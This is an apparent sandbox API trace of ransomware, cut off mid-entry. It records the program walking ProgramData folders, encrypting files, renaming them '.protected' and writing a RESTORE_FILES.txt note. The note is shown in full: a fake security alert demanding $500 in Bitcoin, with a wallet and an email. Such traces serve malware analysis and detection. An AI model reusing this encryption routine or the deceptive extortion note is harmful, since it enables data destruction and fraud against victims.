[0070.946] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.946] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0070.946] CloseHandle (hObject=0xa4) returned 1 [0070.946] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Windows") returned -1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files") returned -1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files (x86)") returned -1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="$Recycle.bin") returned 1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="System Volume Information") returned -1 [0070.946] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 61 [0070.946] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0070.946] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0070.946] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned 63 [0070.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0070.947] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0070.947] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0070.947] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0070.947] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0070.947] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0070.947] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\.") returned 63 [0070.947] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.947] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0070.947] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0070.947] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0070.947] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0070.947] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0070.947] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0070.947] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\..") returned 64 [0070.947] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.947] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.947] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0070.947] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 67 [0070.947] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0070.947] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0070.947] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned 
69 [0070.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0070.950] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0070.950] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0070.950] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0070.950] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0070.950] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0070.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\.") returned 69 [0070.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.950] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0070.950] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0070.950] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0070.950] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0070.950] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0070.950] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0070.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\..") returned 70 [0070.950] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.950] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="Windows") returned -1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="Program Files") returned -1 [0070.950] lstrcmpiW (lpString1="cache.dat", 
lpString2="Program Files (x86)") returned -1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="$Recycle.bin") returned 1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="System Volume Information") returned -1 [0070.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.950] StrStrIW (lpFirst="cache.dat", lpSrch=".protected") returned 0x0 [0070.950] lstrcmpW (lpString1="cache.dat", lpString2="RESTORE_FILES.txt") returned -1 [0070.950] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0070.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0070.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0070.951] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.951] StrStrW (lpFirst="cache.dat", lpSrch=".txt") returned 0x0 [0070.951] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.951] StrStrW (lpFirst="cache.dat", lpSrch=".rar") returned 0x0 [0070.951] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.951] StrStrW (lpFirst="cache.dat", lpSrch=".zip") returned 0x0 [0070.951] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0070.986] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.987] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0070.987] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.987] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0070.994] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0070.994] CloseHandle (hObject=0xd4) returned 1 [0070.995] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.protected") returned 87 [0070.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.protected" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.protected")) returned 1 [0070.996] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0070.996] FindClose (in: hFindFile=0x447c80 | 
out: hFindFile=0x447c80) returned 1 [0070.996] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt") returned 85 [0070.996] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0070.996] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.996] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0070.997] lstrlenA (lpString="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") returned 684 [0070.997] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0070.998] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.998] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0070.998] CloseHandle (hObject=0xb4) returned 1 [0070.998] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="Windows") returned -1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="Program Files") returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="Program Files (x86)") returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="$Recycle.bin") returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="System Volume Information") returned 1 [0070.998] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.998] StrStrIW (lpFirst="tokens.dat", lpSrch=".protected") returned 0x0 [0070.998] lstrcmpW (lpString1="tokens.dat", lpString2="RESTORE_FILES.txt") returned 1 [0070.998] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0070.998] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0070.998] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0070.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.998] StrStrW (lpFirst="tokens.dat", lpSrch=".txt") returned 0x0 [0070.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.999] StrStrW 
(lpFirst="tokens.dat", lpSrch=".rar") returned 0x0 [0070.999] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.999] StrStrW (lpFirst="tokens.dat", lpSrch=".zip") returned 0x0 [0070.999] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.006] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.006] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.007] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.007] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.008] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.009] CloseHandle (hObject=0xb4) returned 1 [0071.010] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.protected") returned 82 [0071.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.protected" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.protected")) returned 1 [0071.011] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.011] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.011] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt") returned 79 [0071.011] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.012] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.012] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.013] lstrlenA (lpString="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") returned 684 [0071.013] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.013] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.013] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.013] CloseHandle (hObject=0xa4) returned 1 [0071.013] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="Windows") returned -1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="Program Files") returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="Program Files (x86)") returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="$Recycle.bin") returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="System Volume Information") returned -1 [0071.013] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC") returned 32 [0071.013] lstrcmpW (lpString1="RAC", lpString2=".") returned 1 [0071.013] lstrcmpW (lpString1="RAC", lpString2="..") returned 1 [0071.013] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*") returned 34 [0071.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.014] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.014] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\.") returned 34 [0071.014] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.014] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.014] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.014] lstrcmpiW 
(lpString1="..", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.014] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\..") returned 35 [0071.014] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.014] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="Windows") returned -1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1="Outbound", lpString2="System Volume Information") returned -1 [0071.014] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound") returned 41 [0071.014] lstrcmpW (lpString1="Outbound", lpString2=".") returned 1 [0071.014] lstrcmpW (lpString1="Outbound", lpString2="..") returned 1 [0071.014] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*") returned 43 [0071.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.014] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.015] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\.") returned 43 [0071.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.015] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.015] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.015] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.015] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\..") returned 44 [0071.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.015] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.015] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.015] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt") returned 59 [0071.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\outbound\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.016] lstrlenA (lpString="! 
